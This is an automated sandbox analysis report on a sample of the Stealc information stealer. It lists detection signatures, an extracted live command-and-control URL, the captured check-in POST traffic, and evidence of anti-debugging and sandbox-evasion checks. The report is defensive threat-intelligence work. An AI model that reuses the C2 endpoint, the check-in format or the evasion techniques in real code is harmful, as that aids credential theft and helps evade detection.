Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1538072
MD5:e6bd9e89d78f9970ffe0edaba03dc207
SHA1:d796439cf7a49abf6a7e19808f6e9da46c40e461
SHA256:20fe22c7cf9c1c920267161320319a6d7b31354826d68c6bca2b188633cfc181
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5084 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E6BD9E89D78F9970FFE0EDABA03DC207)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2090253153.0000000004EC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5084JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5084JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.4f0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-20T09:40:08.469842+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.4f0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_004FC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004F7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_004F9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_004F9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00508EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00508EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005038B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00504910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00504910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_004FDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_004FE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00504570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00504570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_004FED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_004FBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004FDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004F16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FF68A FindFirstFileA,0_2_004FF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00503EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00503EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004FF6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 42 45 34 35 33 30 31 33 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"09BE453013BF1079209047------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"doma------ECGIIIDAKJDHJKFHIEBF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004F4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 42 45 34 35 33 30 31 33 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"09BE453013BF1079209047------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"doma------ECGIIIDAKJDHJKFHIEBF--
                Source: file.exe, 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37$
                Source: file.exe, 00000000.00000002.2144242993.0000000001302000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2144242993.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/curity=Impersonation
                Source: file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
                Source: file.exe, 00000000.00000002.2144242993.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa
                Source: file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
                Source: file.exe, 00000000.00000002.2144242993.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpm
                Source: file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D5A7E0_2_007D5A7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B82DA0_2_008B82DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B8BD70_2_008B8BD7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BCCE60_2_008BCCE6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B3C2D0_2_008B3C2D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AB5DB0_2_009AB5DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098F5E90_2_0098F5E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BDD050_2_008BDD05
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B25530_2_008B2553
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00867D7C0_2_00867D7C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009726B90_2_009726B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C4E1B0_2_007C4E1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00763EC10_2_00763EC1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B566B0_2_008B566B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BFFAC0_2_008BFFAC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00781F830_2_00781F83
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 004F45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: bzasfecw ZLIB complexity 0.9950260495318635
                Source: file.exe, 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2090253153.0000000004EC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00509600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00509600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00503720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00503720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\4VWSQKQ3.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1851392 > 1048576
                Source: file.exeStatic PE information: Raw size of bzasfecw is bigger than: 0x100000 < 0x19de00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.4f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;bzasfecw:EW;cqfnmftx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;bzasfecw:EW;cqfnmftx:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00509860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00509860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c5783 should be: 0x1d1afb
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: bzasfecw
                Source: file.exeStatic PE information: section name: cqfnmftx
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B608F push 6708C69Ch; mov dword ptr [esp], esi0_2_009B5FDC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009570DE push ecx; mov dword ptr [esp], 7DE5FAA4h0_2_0095710D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009570DE push ebp; mov dword ptr [esp], 671C3064h0_2_0095713E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009570DE push ebp; mov dword ptr [esp], 40B82DCCh0_2_00957169
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097C0C0 push edi; mov dword ptr [esp], ecx0_2_0097C0FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050B035 push ecx; ret 0_2_0050B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AB8F7 push ebp; mov dword ptr [esp], 5E1FC633h0_2_009AB92E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AB8F7 push ebx; mov dword ptr [esp], ebp0_2_009AB954
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009478EF push 5EA79727h; mov dword ptr [esp], eax0_2_00947936
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940806 push edx; mov dword ptr [esp], ebx0_2_00940AE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E9026 push edx; mov dword ptr [esp], eax0_2_008E9076
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098B866 push 6E458D10h; mov dword ptr [esp], eax0_2_0098B90E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00836993 push ecx; mov dword ptr [esp], 3655F577h0_2_008369D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00836993 push eax; mov dword ptr [esp], 00000000h0_2_008369DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00836993 push ebx; mov dword ptr [esp], 210159ADh0_2_008369FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009479B0 push eax; mov dword ptr [esp], 53F81215h0_2_009479D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F9A7 push 3F178CF2h; mov dword ptr [esp], ebp0_2_0093F9F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DD9DD push edx; mov dword ptr [esp], ebx0_2_009DDA20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DD9DD push 1EF31658h; mov dword ptr [esp], eax0_2_009DDAAC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008551C7 push ebp; mov dword ptr [esp], eax0_2_0085521E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008551C7 push 14B8E45Fh; mov dword ptr [esp], ebx0_2_00855226
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008551C7 push ecx; mov dword ptr [esp], 4F9F1E1Ah0_2_00855240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092E901 push eax; mov dword ptr [esp], ebp0_2_0092E941
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091010E push 4EC9E7CAh; mov dword ptr [esp], eax0_2_00910139
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091010E push edx; mov dword ptr [esp], eax0_2_0091014A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091010E push 0A4D6EE7h; mov dword ptr [esp], edx0_2_0091025A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F13B push eax; mov dword ptr [esp], 2BA2E260h0_2_0093F14F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F13B push edx; mov dword ptr [esp], ebx0_2_0093F1AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F13B push 5C2CF181h; mov dword ptr [esp], esp0_2_0093F22F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A092E push edx; mov dword ptr [esp], esi0_2_009A13C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A092E push esi; mov dword ptr [esp], ebx0_2_009A13F1
                Source: file.exeStatic PE information: section name: bzasfecw entropy: 7.953590120742498

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00509860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00509860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13419
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD7E4 second address: 8BD7EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4A0C second address: 8C4A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4A12 second address: 8C4A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4A16 second address: 8C4A4F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F98219BDB75h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F98219BDB79h 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4A4F second address: 8C4A90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F9820CD6B96h 0x00000009 jmp 00007F9820CD6BA1h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9820CD6BA1h 0x00000018 jmp 00007F9820CD6BA1h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4BA5 second address: 8C4BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB6Dh 0x00000009 jmp 00007F98219BDB70h 0x0000000e pushad 0x0000000f jmp 00007F98219BDB79h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4D59 second address: 8C4D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
